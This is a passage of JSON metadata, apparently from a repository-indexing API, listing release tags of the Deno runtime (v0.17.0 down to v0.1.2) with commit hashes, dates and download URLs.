land/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/